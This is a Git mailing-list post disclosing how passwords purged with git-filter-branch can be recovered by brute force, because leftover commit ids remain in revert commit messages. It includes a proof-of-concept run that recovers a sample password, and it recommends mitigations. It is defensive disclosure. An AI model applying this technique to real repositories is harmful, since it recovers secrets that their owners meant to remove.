This is a demonstration of a mildly-interesting security concern relating to Git & git-filter-branch - not a vulnerability in Git itself, just in the way it can be used. I thought it was interesting to demonstrate that there is sometimes an avenue of attack for recovering sensitive data that's been removed from Git history using git-filter-branch. I think it's a low-severity issue, you may wish to ignore this, and indeed I've been very politely told already that it's clearly nonsense :) Here's an unmodified repo, in which the user unwisely committed a database password: https://github.com/bfg-repo-cleaner-demos/gma-demo-repo-original/commit/8c9cfe3c The unwise commit is reverted with a second commit using 'git revert', which obviously leaves the password in Git history, and - some time later - it's decided to properly clean the repo history with git-filter-branch & git gc, purging the password so the repo can be more widely shared (open-sourced, or just externally hosted). git-filter-branch works exactly as intended, purging the password, but the one thing it does not- typically - do is update the commit message. So in the cleaned repo, the commit message for the revert commit still looks like this: https://github.com/bfg-repo-cleaner-demos/gma-demo-repo-git-filter-branch-cleaned/commit/bf0637a5 It contains a commit id (8c9cfe3) which is no longer in the repo, but can very easily be associated with an existing commit simply by examining the subject line of the reverted commit ("Carelessly checking password into source control"). It's also obvious, from examining the repo, where the excised data was removed (ie at the "db.password=" line). At this point it's possible to do a brute-force attack where you generate possible passwords, insert them into the available commit's tree, and compare them against the leaked commit id. When the the commit id matches, the sensitive data has been recovered. A proof-of-concept implementation of this attack was indeed able to recover the purged password: -- $ java -jar gma-0.1.jar 8c9cfe3c attack-pinpoint gma-demo-repo-git-filter-branch-cleaned Brute-force search using these characters : 0123456789abcdefghijklmnopqrstuvwxyz Available commit, presumed cleaned : 8ebbf661 File path : src/main/resources/config.properties Template blob : dca1a2fb Exhausted strings of length 1 or less ... Exhausted strings of length 4 or less Match with '0g6rw' -- So all of this amounts to a fairly low severity issue - people should always change credentials when they mistakenly commit them to a repo - but I guess the point is that from a paranoia point of view, you want to remove all information - including old commit hashes buried in commit messages - that relate to sensitive data when you clean a repo for sharing. The git-filter-branch command has a --msg-filter option which could be used for this purpose, with the application of some judicious bash-scripting, grep&sed-ing. However, I must confess that I believe users would be better advised to use The BFG: http://rtyley.github.io/bfg-repo-cleaner/ The BFG already addresses this issue by replacing all old Git object-ids found in commit/tag messages with the updated id. For instance, here's that exact same commit message when cleaned with the BFG: https://github.com/bfg-repo-cleaner-demos/gma-demo-repo-bfg-cleaned/commit/35840201 In the case that the users specifies a filtering operation is not removing 'private' data, the BFG replaces old ids with text of the form '"newid [formerly oldid]", but if the operation is in fact to strip private data, the replacement value is simply the newid - and without the old commit id, the attack described above is not possible. I believe it's worth educating users to give them a more realistic understanding of their exposure, and would like to update the documentation of git-filter-branch to give them a better idea of their options for removing private data - that would include noting the BFG as alternative. - Roberto Tyley https://github.com/rtyley/bfg-repo-cleaner/blob/v1.2.0/src/main/scala/com/madgag/git/bfg/cleaner/ObjectIdSubstitutor.scala#L33-L60 -- To unsubscribe from this list: send the line "unsubscribe git" in the body of a message to majordomo@xxxxxxxxxxxxxxx More majordomo info at http://vger.kernel.org/majordomo-info.html